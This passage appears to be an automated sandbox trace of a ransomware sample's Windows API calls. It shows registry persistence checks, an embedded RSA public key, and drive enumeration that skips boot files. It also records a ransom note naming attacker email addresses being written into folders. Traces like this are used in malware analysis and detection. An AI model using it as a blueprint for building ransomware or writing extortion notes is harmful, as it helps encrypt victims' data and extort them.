lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", phkResult=0x18075c | out: phkResult=0x18075c*=0x26c) returned 0x0 [0092.662] RegQueryValueExW (in: hKey=0x26c, lpValueName="BCE1010314", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0092.662] Sleep (dwMilliseconds=0x1388) [0098.283] OutputDebugStringA (lpOutputString="-") [0098.283] GetUserNameW (in: lpBuffer=0x180da4, pcbBuffer=0x180b88 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x180b88) returned 1 [0098.284] wsprintfW (in: param_1=0x180b9c, param_2="%08X_offset" | out: param_1="E1010314_offset") returned 15 [0098.284] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="E1010314_offset") returned 0x270 [0098.284] WaitForSingleObject (hHandle=0x270, dwMilliseconds=0x0) returned 0x0 [0098.284] GetTickCount () returned 0x75da [0098.284] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x180af0, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0098.284] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1806e0, csidl=35, fCreate=0 | out: pszPath="C:\\ProgramData") returned 1 [0098.299] lstrcpyW (in: lpString1=0x1808e8, lpString2="C:\\ProgramData" | out: lpString1="C:\\ProgramData") returned="C:\\ProgramData" [0098.299] lstrcatW (in: lpString1="C:\\ProgramData", lpString2="\\" | out: lpString1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0098.299] lstrcatW (in: lpString1="C:\\ProgramData\\", lpString2="F06C3C509054X0B7D28ZCDDBB17087B9C3E." | out: lpString1="C:\\ProgramData\\F06C3C509054X0B7D28ZCDDBB17087B9C3E.") returned="C:\\ProgramData\\F06C3C509054X0B7D28ZCDDBB17087B9C3E." [0098.299] lstrcatW (in: lpString1="C:\\ProgramData\\F06C3C509054X0B7D28ZCDDBB17087B9C3E.", lpString2="XZZX" | out: lpString1="C:\\ProgramData\\F06C3C509054X0B7D28ZCDDBB17087B9C3E.XZZX") returned="C:\\ProgramData\\F06C3C509054X0B7D28ZCDDBB17087B9C3E.XZZX" [0098.299] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCetENrtjivjYOthpX2yTlYKJ0x gZ0R367J8tSFikEhVoko4SKRmN9Y1s88iCdeRPUZh2Q0rHOesf/AxONK1buzygXl BkE5X86I3EFUFbPjyOnIgEKFru728aLlwkslqYPIWS29DZUCboHzv1YWU8gtFkwL 5bUEB444se2UXi+pjwIDAQAB -----END PUBLIC KEY-----") returned 271 [0098.299] CreateFileW (lpFileName="C:\\ProgramData\\F06C3C509054X0B7D28ZCDDBB17087B9C3E.XZZX" (normalized: "c:\\programdata\\f06c3c509054x0b7d28zcddbb17087b9c3e.xzzx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x274 [0098.346] CloseHandle (hObject=0x274) returned 1 [0098.347] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1806dc, csidl=35, fCreate=0 | out: pszPath="C:\\ProgramData") returned 1 [0098.347] lstrcpyW (in: lpString1=0x1808e4, lpString2="C:\\ProgramData" | out: lpString1="C:\\ProgramData") returned="C:\\ProgramData" [0098.347] lstrcatW (in: lpString1="C:\\ProgramData", lpString2="\\" | out: lpString1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0098.347] lstrcatW (in: lpString1="C:\\ProgramData\\", lpString2="F06C3C509054X0B7D28ZCDDBB17087B9C3E." | out: lpString1="C:\\ProgramData\\F06C3C509054X0B7D28ZCDDBB17087B9C3E.") returned="C:\\ProgramData\\F06C3C509054X0B7D28ZCDDBB17087B9C3E." [0098.347] lstrcatW (in: lpString1="C:\\ProgramData\\F06C3C509054X0B7D28ZCDDBB17087B9C3E.", lpString2="XZZX" | out: lpString1="C:\\ProgramData\\F06C3C509054X0B7D28ZCDDBB17087B9C3E.XZZX") returned="C:\\ProgramData\\F06C3C509054X0B7D28ZCDDBB17087B9C3E.XZZX" [0098.347] CreateFileW (lpFileName="C:\\ProgramData\\F06C3C509054X0B7D28ZCDDBB17087B9C3E.XZZX" (normalized: "c:\\programdata\\f06c3c509054x0b7d28zcddbb17087b9c3e.xzzx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x274 [0098.347] GetFileSize (in: hFile=0x274, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x10f [0098.347] ReadFile (in: hFile=0x274, lpBuffer=0x3b7d00, nNumberOfBytesToRead=0x10f, lpNumberOfBytesRead=0x1806d8, lpOverlapped=0x0 | out: lpBuffer=0x3b7d00*, lpNumberOfBytesRead=0x1806d8*=0x10f, lpOverlapped=0x0) returned 1 [0098.348] CloseHandle (hObject=0x274) returned 1 [0098.348] StrStrA (lpFirst="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----", lpSrch="-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0098.348] OutputDebugStringA (lpOutputString="START1") [0098.349] SetErrorMode (uMode=0x1) returned 0x1 [0098.349] GetLogicalDriveStringsW (in: nBufferLength=0x34, lpBuffer=0x1815f8 | out: lpBuffer="C:\\") returned 0x4 [0098.349] GetDriveTypeW (lpRootPathName="C:") returned 0x3 [0098.349] SetErrorMode (uMode=0x1) returned 0x1 [0098.349] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:" | out: lpString1="C:") returned="C:" [0098.349] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0098.349] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\" | out: lpString1="C:\\") returned="C:\\" [0098.349] lstrcatW (in: lpString1="C:\\", lpString2="*.*" | out: lpString1="C:\\*.*") returned="C:\\*.*" [0098.349] FindFirstFileW (in: lpFileName="C:\\*.*", lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 0x3a54d0 [0098.349] PathFindFileNameW (pszPath="C:") returned="C:" [0098.349] lstrcpyW (in: lpString1=0x17f8c4, lpString2="C:" | out: lpString1="C:") returned="C:" [0098.349] FindNextFileW (in: hFindFile=0x3a54d0, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0098.349] lstrcmpW (lpString1="B0AD3AB92537B4FBFE37930729309943.XZZX", lpString2="..") returned 1 [0098.349] lstrcmpW (lpString1="B0AD3AB92537B4FBFE37930729309943.XZZX", lpString2=".") returned 1 [0098.349] StrStrW (lpFirst="B0AD3AB92537B4FBFE37930729309943.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0098.349] StrStrW (lpFirst="B0AD3AB92537B4FBFE37930729309943.XZZX", lpSrch="ntldr") returned 0x0 [0098.350] StrStrW (lpFirst="B0AD3AB92537B4FBFE37930729309943.XZZX", lpSrch="NTLDR") returned 0x0 [0098.350] StrStrW (lpFirst="B0AD3AB92537B4FBFE37930729309943.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0098.350] StrStrW (lpFirst="B0AD3AB92537B4FBFE37930729309943.XZZX", lpSrch="ntdetect.com") returned 0x0 [0098.350] StrStrW (lpFirst="C:\\", lpSrch="Desktop") returned 0x0 [0098.350] StrStrW (lpFirst="C:\\", lpSrch="DESKTOP") returned 0x0 [0098.350] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\") returned 7 [0098.350] lstrcpyA (in: lpString1=0x17fafc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0098.350] lstrcpyW (in: lpString1=0x1800fc, lpString2="B0AD3AB92537B4FBFE37930729309943.XZZX" | out: lpString1="B0AD3AB92537B4FBFE37930729309943.XZZX") returned="B0AD3AB92537B4FBFE37930729309943.XZZX" [0098.350] lstrcpyW (in: lpString1=0x17fcfc, lpString2="\\\\?\\C:\\" | out: lpString1="\\\\?\\C:\\") returned="\\\\?\\C:\\" [0098.350] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17fafc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x27c [0098.350] Sleep (dwMilliseconds=0x96) [0098.819] FindNextFileW (in: hFindFile=0x3a54d0, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0098.819] FindNextFileW (in: hFindFile=0x3a54d0, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0098.819] lstrcmpW (lpString1="bootmgr", lpString2="..") returned 1 [0098.819] lstrcmpW (lpString1="bootmgr", lpString2=".") returned 1 [0098.819] StrStrW (lpFirst="bootmgr", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0098.819] StrStrW (lpFirst="bootmgr", lpSrch="ntldr") returned 0x0 [0098.819] StrStrW (lpFirst="bootmgr", lpSrch="NTLDR") returned 0x0 [0098.819] StrStrW (lpFirst="bootmgr", lpSrch="NTDETECT.COM") returned 0x0 [0098.819] StrStrW (lpFirst="bootmgr", lpSrch="ntdetect.com") returned 0x0 [0098.819] StrStrW (lpFirst="C:\\", lpSrch="Desktop") returned 0x0 [0098.819] StrStrW (lpFirst="C:\\", lpSrch="DESKTOP") returned 0x0 [0098.819] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\") returned 7 [0098.819] lstrcpyA (in: lpString1=0x17fafc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0098.819] lstrcpyW (in: lpString1=0x1800fc, lpString2="bootmgr" | out: lpString1="bootmgr") returned="bootmgr" [0098.819] lstrcpyW (in: lpString1=0x17fcfc, lpString2="\\\\?\\C:\\" | out: lpString1="\\\\?\\C:\\") returned="\\\\?\\C:\\" [0098.819] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17fafc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x280 [0098.820] Sleep (dwMilliseconds=0x96) [0098.979] FindNextFileW (in: hFindFile=0x3a54d0, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0098.979] FindNextFileW (in: hFindFile=0x3a54d0, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0098.979] FindNextFileW (in: hFindFile=0x3a54d0, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0098.979] lstrcmpW (lpString1="hiberfil.sys", lpString2="..") returned 1 [0098.979] lstrcmpW (lpString1="hiberfil.sys", lpString2=".") returned 1 [0098.979] StrStrW (lpFirst="hiberfil.sys", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0098.979] StrStrW (lpFirst="hiberfil.sys", lpSrch="ntldr") returned 0x0 [0098.979] StrStrW (lpFirst="hiberfil.sys", lpSrch="NTLDR") returned 0x0 [0098.979] StrStrW (lpFirst="hiberfil.sys", lpSrch="NTDETECT.COM") returned 0x0 [0098.979] StrStrW (lpFirst="hiberfil.sys", lpSrch="ntdetect.com") returned 0x0 [0098.979] StrStrW (lpFirst="C:\\", lpSrch="Desktop") returned 0x0 [0098.979] StrStrW (lpFirst="C:\\", lpSrch="DESKTOP") returned 0x0 [0098.979] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\") returned 7 [0098.979] lstrcpyA (in: lpString1=0x17fafc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0098.979] lstrcpyW (in: lpString1=0x1800fc, lpString2="hiberfil.sys" | out: lpString1="hiberfil.sys") returned="hiberfil.sys" [0098.979] lstrcpyW (in: lpString1=0x17fcfc, lpString2="\\\\?\\C:\\" | out: lpString1="\\\\?\\C:\\") returned="\\\\?\\C:\\" [0098.979] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17fafc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x284 [0098.980] Sleep (dwMilliseconds=0x96) [0099.136] FindNextFileW (in: hFindFile=0x3a54d0, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0099.136] FindNextFileW (in: hFindFile=0x3a54d0, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0099.136] lstrcmpW (lpString1="pagefile.sys", lpString2="..") returned 1 [0099.136] lstrcmpW (lpString1="pagefile.sys", lpString2=".") returned 1 [0099.136] StrStrW (lpFirst="pagefile.sys", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0099.136] StrStrW (lpFirst="pagefile.sys", lpSrch="ntldr") returned 0x0 [0099.136] StrStrW (lpFirst="pagefile.sys", lpSrch="NTLDR") returned 0x0 [0099.136] StrStrW (lpFirst="pagefile.sys", lpSrch="NTDETECT.COM") returned 0x0 [0099.136] StrStrW (lpFirst="pagefile.sys", lpSrch="ntdetect.com") returned 0x0 [0099.136] StrStrW (lpFirst="C:\\", lpSrch="Desktop") returned 0x0 [0099.136] StrStrW (lpFirst="C:\\", lpSrch="DESKTOP") returned 0x0 [0099.136] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\") returned 7 [0099.136] lstrcpyA (in: lpString1=0x17fafc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0099.136] lstrcpyW (in: lpString1=0x1800fc, lpString2="pagefile.sys" | out: lpString1="pagefile.sys") returned="pagefile.sys" [0099.136] lstrcpyW (in: lpString1=0x17fcfc, lpString2="\\\\?\\C:\\" | out: lpString1="\\\\?\\C:\\") returned="\\\\?\\C:\\" [0099.136] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17fafc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x288 [0099.140] Sleep (dwMilliseconds=0x96) [0099.303] FindNextFileW (in: hFindFile=0x3a54d0, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0099.303] FindNextFileW (in: hFindFile=0x3a54d0, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0099.303] FindNextFileW (in: hFindFile=0x3a54d0, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0099.303] FindNextFileW (in: hFindFile=0x3a54d0, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0099.303] FindNextFileW (in: hFindFile=0x3a54d0, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0099.303] FindNextFileW (in: hFindFile=0x3a54d0, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0099.303] FindNextFileW (in: hFindFile=0x3a54d0, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0099.303] FindNextFileW (in: hFindFile=0x3a54d0, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0099.303] FindNextFileW (in: hFindFile=0x3a54d0, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 1 [0099.303] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0099.303] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0099.303] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0099.303] FindNextFileW (in: hFindFile=0x3a54d0, lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 0 [0099.303] FindClose (in: hFindFile=0x3a54d0 | out: hFindFile=0x3a54d0) returned 1 [0099.303] FindClose (in: hFindFile=0x3a54d0 | out: hFindFile=0x3a54d0) returned 0 [0099.303] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:" | out: lpString1="C:") returned="C:" [0099.303] lstrcatW (in: lpString1="C:", lpString2="\\*.*" | out: lpString1="C:\\*.*") returned="C:\\*.*" [0099.303] StrStrW (lpFirst="C:\\", lpSrch="Desktop") returned 0x0 [0099.303] StrStrW (lpFirst="C:\\", lpSrch="DESKTOP") returned 0x0 [0099.303] SetErrorMode (uMode=0x1) returned 0x1 [0099.303] wsprintfW (in: param_1=0x17f6bc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\_HELP_INSTRUCTION.TXT") returned 24 [0099.303] GetUserNameW (in: lpBuffer=0x17d498, pcbBuffer=0x17d284 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17d284) returned 1 [0099.304] wsprintfW (in: param_1=0x17d290, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0099.304] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17d28c | out: phkResult=0x17d28c*=0x28c) returned 0x0 [0099.304] RegQueryValueExW (in: hKey=0x28c, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3a94a0, lpcbData=0x17d288*=0x104 | out: lpType=0x0, lpData=0x3a94a0*=0x65, lpcbData=0x17d288*=0x4a) returned 0x0 [0099.304] RegCloseKey (hKey=0x28c) returned 0x0 [0099.304] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17e6bc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0099.304] wsprintfW (in: param_1=0x17d6bc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0099.304] CreateFileW (lpFileName="C:\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x28c [0099.375] CloseHandle (hObject=0x28c) returned 1 [0099.375] FindFirstFileW (in: lpFileName="C:\\*.*", lpFindFileData=0x180500 | out: lpFindFileData=0x180500) returned 0x3a54d0 [0099.375] PathFindFileNameW (pszPath="C:") returned="C:" [0099.375] lstrcpyW (in: lpString1=0x17f8c4, lpString2="C:" | out: lpString1="C:") returned="C:" [0099.375] lstrcmpW (lpString1="$Recycle.Bin", lpString2="..") returned -1 [0099.375] lstrcmpW (lpString1="$Recycle.Bin", lpString2=".") returned -1 [0099.375] lstrcpyW (in: lpString1=0x180750, lpString2="C:" | out: lpString1="C:") returned="C:" [0099.375] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0099.375] lstrcatW (in: lpString1="C:\\", lpString2="$Recycle.Bin" | out: lpString1="C:\\$Recycle.Bin") returned="C:\\$Recycle.Bin" [0099.375] SetErrorMode (uMode=0x1) returned 0x1 [0099.375] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\$Recycle.Bin" | out: lpString1="C:\\$Recycle.Bin") returned="C:\\$Recycle.Bin" [0099.375] lstrcatW (in: lpString1="C:\\$Recycle.Bin", lpString2="\\" | out: lpString1="C:\\$Recycle.Bin\\") returned="C:\\$Recycle.Bin\\" [0099.375] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\$Recycle.Bin\\" | out: lpString1="C:\\$Recycle.Bin\\") returned="C:\\$Recycle.Bin\\" [0099.375] lstrcatW (in: lpString1="C:\\$Recycle.Bin\\", lpString2="*.*" | out: lpString1="C:\\$Recycle.Bin\\*.*") returned="C:\\$Recycle.Bin\\*.*" [0099.375] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0x3a5510 [0099.376] PathFindFileNameW (pszPath="C:\\$Recycle.Bin") returned="$Recycle.Bin" [0099.376] lstrcpyW (in: lpString1=0x17e824, lpString2="$Recycle.Bin" | out: lpString1="$Recycle.Bin") returned="$Recycle.Bin" [0099.376] FindClose (in: hFindFile=0x3a5510 | out: hFindFile=0x3a5510) returned 1 [0099.376] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\$Recycle.Bin" | out: lpString1="C:\\$Recycle.Bin") returned="C:\\$Recycle.Bin" [0099.376] lstrcatW (in: lpString1="C:\\$Recycle.Bin", lpString2="\\*.*" | out: lpString1="C:\\$Recycle.Bin\\*.*") returned="C:\\$Recycle.Bin\\*.*" [0099.376] StrStrW (lpFirst="C:\\$Recycle.Bin\\", lpSrch="Desktop") returned 0x0 [0099.376] StrStrW (lpFirst="C:\\$Recycle.Bin\\", lpSrch="DESKTOP") returned 0x0 [0099.376] SetErrorMode (uMode=0x1) returned 0x1 [0099.376] wsprintfW (in: param_1=0x17e61c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\$Recycle.Bin\\_HELP_INSTRUCTION.TXT") returned 37 [0099.376] GetUserNameW (in: lpBuffer=0x17c3f8, pcbBuffer=0x17c1e4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17c1e4) returned 1 [0099.376] wsprintfW (in: param_1=0x17c1f0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0099.377] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17c1ec | out: phkResult=0x17c1ec*=0x290) returned 0x0 [0099.377] RegQueryValueExW (in: hKey=0x290, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cac3d8, lpcbData=0x17c1e8*=0x104 | out: lpType=0x0, lpData=0x3cac3d8*=0x65, lpcbData=0x17c1e8*=0x4a) returned 0x0 [0099.377] RegCloseKey (hKey=0x290) returned 0x0 [0099.377] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, 